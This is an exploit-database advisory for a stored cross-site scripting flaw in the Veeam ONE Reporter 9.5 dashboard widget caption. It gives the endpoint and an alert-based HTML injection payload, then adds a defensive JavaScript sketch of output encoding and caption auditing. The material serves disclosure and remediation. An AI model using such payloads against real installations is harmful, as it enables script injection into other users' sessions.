Veeam ONE Reporter 9.5.0.3201 – Persistent Cross-site Scripting (Add/Edit Widget)

  • Author: Seyed Sadegh Khatami
    Date: 2019-04-30
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/46767/
  • # Exploit Title: Veeam ONE Reporter - Stored Cross-site Scripting (Add/Edit Widget)
    # Exploit Author: Seyed Sadegh Khatami
    # Website: https://www.cert.ir
    # Date: 2019-04-27
    # Google Dork: N/A
    # Vendor Homepage: https://www.veeam.com/
    # Software Link: https://www.veeam.com/virtual-server-management-one-free.html
    # Version: 9.5.0.3201
    # Tested on: Windows Server 2016
    
    
    #exploit:
    
    Path: /CommonDataHandlerReadOnly.ashx 
    
    method: setDashboardWidget
    
    SET Caption field to “AAAAAAAA</div><img src=S onerror=alert('KHATAMI');><div>”
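
The fix for this class of bug is to encode the stored caption when it is written into the page. The sketch below is an added example, not Veeam's code and not part of the original report: it contrasts raw concatenation with encoded output for the caption value given above, and adds a small audit helper for captions already saved. The `widget-caption` wrapper, the function names and the sample widget list are assumptions.

```javascript
// Added example, not Veeam's code. The <div class="widget-caption"> wrapper is an
// assumed layout, inferred from the </div>...<div> framing of the reported value.

// Caption value exactly as given in the report.
const REPORTED_CAPTION =
  "AAAAAAAA</div><img src=S onerror=alert('KHATAMI');><div>";

// Encode the characters that let text leave an HTML text or attribute context.
function encodeHtml(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Before: the stored caption is concatenated into markup unchanged.
function renderCaptionUnsafe(caption) {
  return '<div class="widget-caption">' + caption + "</div>";
}

// After: the stored caption is encoded at output time, so it stays text.
function renderCaptionSafe(caption) {
  return '<div class="widget-caption">' + encodeHtml(caption) + "</div>";
}

// Count HTML tags in rendered output. A caption that stayed text yields
// exactly two: the wrapper's opening and closing tag.
function countTags(html) {
  return (html.match(/<\/?[a-zA-Z][^>]*>/g) || []).length;
}

// Audit helper: ids of saved widgets whose caption contains tag-like markup
// and should be reviewed or re-saved after the rendering fix is deployed.
function findSuspectCaptions(widgets) {
  return widgets.filter((w) => /<\/?[a-zA-Z!]/.test(w.caption)).map((w) => w.id);
}

// Constructed sample data (not taken from a real installation).
const SAMPLE_WIDGETS = [
  { id: 1, caption: "CPU usage < 80%" },
  { id: 2, caption: REPORTED_CAPTION },
  { id: 3, caption: "Backup jobs & alarms" },
];

console.log("tags, unsafe render:", countTags(renderCaptionUnsafe(REPORTED_CAPTION)));
console.log("tags, safe render:  ", countTags(renderCaptionSafe(REPORTED_CAPTION)));
console.log("captions to review: ", findSuspectCaptions(SAMPLE_WIDGETS));
```

Encoding at output leaves legitimate captions such as "CPU usage < 80%" displayable, which filtering on input would not.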